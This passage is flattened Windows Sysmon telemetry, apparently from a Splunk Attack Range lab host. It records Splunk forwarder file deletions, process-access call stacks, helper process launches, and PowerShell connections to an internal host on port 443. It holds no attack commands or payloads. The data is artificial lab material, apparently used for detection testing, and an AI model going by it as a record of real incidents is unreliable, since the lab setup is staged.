Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=A3EE977B3513C8FE99A26DB4F7AC20A2,SHA256=6E9B9D69053CB33C6E28093A2D2C89CA75F9A8C767046F032676026CABB15873,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498442Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.295{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=1B2DAF9A91FA15DD004EE95F85BBC356,SHA256=0E8AD398F066F6939459268AF7014E33A27125A922A6DC53FCE9F1BE44388E22,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498481Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:01.556{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5231D285D545412BE6A69D927F33BD39,SHA256=98D8C9B66815C10B167D5951EC2CF3F3B290B121A9A9FB885FC6DFF44E617BFC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498482Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:02.586{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B66F65F236DE1A2BE5B3F3219A9A8E88,SHA256=F00C3A516D6F9712B9E69D1601FACC07669CB3178ECEC7DF8B7C8608E9277FD7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498485Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:34.023{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50649-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498484Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:03.601{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0FC52E69FC008A7842DC3E60691C8E3,SHA256=A47E7FD5F6D9B1361A5799456179ED8C61652E55493F62806D154E04DAFACC32,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498483Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:03.370{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C0134E78F5BD34206ADE93615F9CB9BB,SHA256=A0EDD6883DC7A7F50A1E83E1948578A031069B7243575AA2BF85985E5762CD35,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498486Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:04.615{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F20C97823139A8F8369C8DE4028EC1C0,SHA256=33FC920EC6E5CD10E81BE8567A227688DB45AA63931A6422F0A2257A76CD39EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498488Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:35.774{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50650-false10.0.1.12-8000- 23542300x800000000000000036498487Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:05.632{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AAB8AB0361E60EC94BE516260B2A686,SHA256=22F85DDAFD4815DA7E589E75BDF4264D17AB77312F3CF43E1AD13B824F9A459B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498489Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:06.650{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA8BDA8FF7B071DE1C0A0BF859477667,SHA256=2D6EC6301B19EB199C30493E87AF3D7AAB4F00B895DA69ADAC3097D92C65079E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498499Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.980{B81B27B7-A1FF-6140-AC56-04000000C801}69323380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498498Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.832{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A1FF-6140-AC56-04000000C801}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498497Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.830{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498496Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.830{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498495Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.830{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498494Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.830{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498493Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.830{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A1FF-6140-AC56-04000000C801}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498492Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.829{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A1FF-6140-AC56-04000000C801}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498491Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.812{B81B27B7-A1FF-6140-AC56-04000000C801}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498490Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.665{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BEAB238D71CE653A11A568D7A6D1A96,SHA256=F7EB02B36FF6D7C9A0BA8DE0C1F46FDAACA76F829D4B43E5D41567DA06EE81BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498510Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.894{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66ADAFFA063B31E5F69D627AC484518C,SHA256=F5D47327D33D42703C5378C4FD68E9677327C9A291C947140690B74AC0CFAC88,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498509Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.894{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03096B316B445498CDB80B92729F83AE,SHA256=17099BE545FA2BC77C90AD116187120A47A10306CD094B1068345DA0513DE309,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498508Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.679{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F1D78B2737979FEA8C792A47D93D4B8,SHA256=5FCA120472690D58D0969ED274A89F9E2BB5757E2C3EFAA470F5B277C636EB12,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498507Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.530{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A200-6140-AD56-04000000C801}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498506Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.528{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498505Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.527{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498504Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.527{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498503Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.527{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498502Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.527{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A200-6140-AD56-04000000C801}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498501Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.527{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A200-6140-AD56-04000000C801}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498500Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:08.511{B81B27B7-A200-6140-AD56-04000000C801}5404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036498513Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:40.038{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50651-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498512Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:09.709{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACCBE26378484AEF8581ADE400A2FEFC,SHA256=0866E2920706C6BC4E87C286B166F17C5FBA45EEA24CDA2EFF4C277A34F47589,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498511Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:09.478{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F49C74FCC3FF113083089EE07652DA2D,SHA256=30A4DEA4BE63DB77E88BEEC02425C66089166DDC50C986D5350678CD6C79DED2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498514Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:10.726{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FCF83308872329DCBBD7DD06617AA5B,SHA256=3A5A0D48C0041512F54E94E079D483583C3BB27C56238641D60E1724373E79BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498516Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:41.798{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50652-false10.0.1.12-8000- 23542300x800000000000000036498515Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:11.729{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E98832193E0FD27D2877B482DC744282,SHA256=6AC7953D42413B89C18E8EA4337AFF076DE0A1085B209F3A357BE8B42B516306,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498517Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:12.744{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 